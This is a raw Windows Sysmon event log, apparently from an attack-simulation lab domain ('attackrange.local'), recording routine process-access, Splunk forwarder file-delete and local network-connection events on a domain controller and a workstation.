21:51:19.484{896A638B-B5CA-6058-0D00-00000000AE01}884904C:\Windows\system32\svchost.exe{896A638B-B8E2-6058-B102-00000000AE01}4244C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918559Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:19.484{896A638B-B5CA-6058-0D00-00000000AE01}884904C:\Windows\system32\svchost.exe{896A638B-B8E2-6058-B102-00000000AE01}4244C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918558Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:19.484{896A638B-B5CA-6058-0D00-00000000AE01}884904C:\Windows\system32\svchost.exe{896A638B-B8E2-6058-B102-00000000AE01}4244C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918557Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:19.484{896A638B-B5CA-6058-0D00-00000000AE01}884904C:\Windows\system32\svchost.exe{896A638B-B8E2-6058-B102-00000000AE01}4244C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918556Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:19.484{896A638B-B5CA-6058-0D00-00000000AE01}884904C:\Windows\system32\svchost.exe{896A638B-B8E2-6058-B102-00000000AE01}4244C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918555Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:19.484{896A638B-B5CA-6058-0D00-00000000AE01}884904C:\Windows\system32\svchost.exe{896A638B-B8E2-6058-B102-00000000AE01}4244C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918554Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:19.484{896A638B-B5CA-6058-0D00-00000000AE01}884904C:\Windows\system32\svchost.exe{896A638B-B8E2-6058-B102-00000000AE01}4244C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918553Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:19.483{896A638B-B5CA-6058-0D00-00000000AE01}884904C:\Windows\system32\svchost.exe{896A638B-B8E2-6058-B102-00000000AE01}4244C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918552Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:19.483{896A638B-B5CA-6058-0D00-00000000AE01}884904C:\Windows\system32\svchost.exe{896A638B-B8E2-6058-B102-00000000AE01}4244C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918551Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:19.483{896A638B-B5CA-6058-0D00-00000000AE01}884904C:\Windows\system32\svchost.exe{896A638B-B8E2-6058-B102-00000000AE01}4244C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918550Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:19.483{896A638B-B5CA-6058-0D00-00000000AE01}884904C:\Windows\system32\svchost.exe{896A638B-B8E2-6058-B102-00000000AE01}4244C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918549Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:19.483{896A638B-B5CA-6058-0D00-00000000AE01}884904C:\Windows\system32\svchost.exe{896A638B-B8E2-6058-B102-00000000AE01}4244C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918548Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:19.483{896A638B-B5CA-6058-0D00-00000000AE01}884904C:\Windows\system32\svchost.exe{896A638B-B8E2-6058-B102-00000000AE01}4244C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918547Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:19.483{896A638B-B5CA-6058-0D00-00000000AE01}884904C:\Windows\system32\svchost.exe{896A638B-B8E2-6058-B102-00000000AE01}4244C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918546Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:19.483{896A638B-B5CA-6058-0D00-00000000AE01}884904C:\Windows\system32\svchost.exe{896A638B-B8E2-6058-B102-00000000AE01}4244C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918545Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:19.483{896A638B-B5CA-6058-0D00-00000000AE01}884904C:\Windows\system32\svchost.exe{896A638B-B8E2-6058-B102-00000000AE01}4244C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918544Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:19.483{896A638B-B5CA-6058-0D00-00000000AE01}884904C:\Windows\system32\svchost.exe{896A638B-B8E2-6058-B102-00000000AE01}4244C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918543Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:19.483{896A638B-B5CA-6058-0D00-00000000AE01}884904C:\Windows\system32\svchost.exe{896A638B-B8E2-6058-B102-00000000AE01}4244C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918542Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:19.483{896A638B-B5CA-6058-0D00-00000000AE01}884904C:\Windows\system32\svchost.exe{896A638B-B8E2-6058-B102-00000000AE01}4244C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918541Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:19.483{896A638B-B5CA-6058-0D00-00000000AE01}884904C:\Windows\system32\svchost.exe{896A638B-B8E2-6058-B102-00000000AE01}4244C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005918540Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:19.149{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B7B577BD575AB43175EA457717E57758,SHA256=34400A0B3F8A0EE8E026484D10BE949EF4F02601E94292644C756E7712723E57,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638814Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:20.772{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=464EEFE0C6F5246B5B76CCBD31D2E312,SHA256=3F2E0151B651F7C402AC7E7D930D45FDAAEC4CE15827841E9FC4A7377007DE0C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005918585Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:20.756{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918584Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:20.756{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005918583Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:20.710{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=42AD7787F04ECB55790D5A0E3903AE26,SHA256=153AB43EAC70B90163823BFC86CE81C53E9DBA1CF3CC6E181A788A015B1CBA78,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005918582Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:20.698{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2386E8D3359735420D5BFE68140547F0,SHA256=F762483B3655FFBE2FE0DE99A116568C2F8DFD8A2E04D223D90F0696F3C7EEAD,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000638813Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:16.441{BFB545BB-B903-6058-D000-00000000AF01}1216C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-692.attackrange.local57272-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000638812Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:20.147{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=80F0C84E22248AB1CF4E04CF651B90E8,SHA256=D62F936CADE06ACB29A3ABAAA245A709452A73E33B2690865A7631122A78D3C6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638811Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:20.147{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=610155B7F1C7574256D3B95C92F1E4DD,SHA256=BD72FEAF479922952AE8517C447D29969408E5ACB350A5B0DF501CA2F02D2389,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638815Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:21.787{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ED9233279FEB322971695E4C4073F6DC,SHA256=C7DEA4B3A1033F7C329B911112C89291548400569ADC76A5C94826D3AB242BE9,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005918589Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:21.757{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918588Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:21.757{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005918587Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:21.701{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=79A432FE66BAF45B9E03EE0F8F64E36F,SHA256=042FDFBD1E4A780A7E75D19DA7297E3480E6637AA9BC49A3780B04F192B1A5F3,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000005918586Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:18.388{896A638B-B5DB-6058-2700-00000000AE01}3020C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-792.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-792.attackrange.local54737- 10341000x80000000000000005918592Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:22.757{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918591Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:22.757{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005918590Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:22.711{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3A2835A29F5FBCC63C3BB3B36B826479,SHA256=A2CFFE37215200B833226D574A5E71C4FBE12313658791748C01D3A8C1A24943,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638816Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:22.803{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C0833968F36BB20D190280DBBAE49565,SHA256=54A70D0CBC65CBCECA05EF141C7D36F0CEB6C0B8B5824651C9F9B1986F9C4C16,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005918596Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 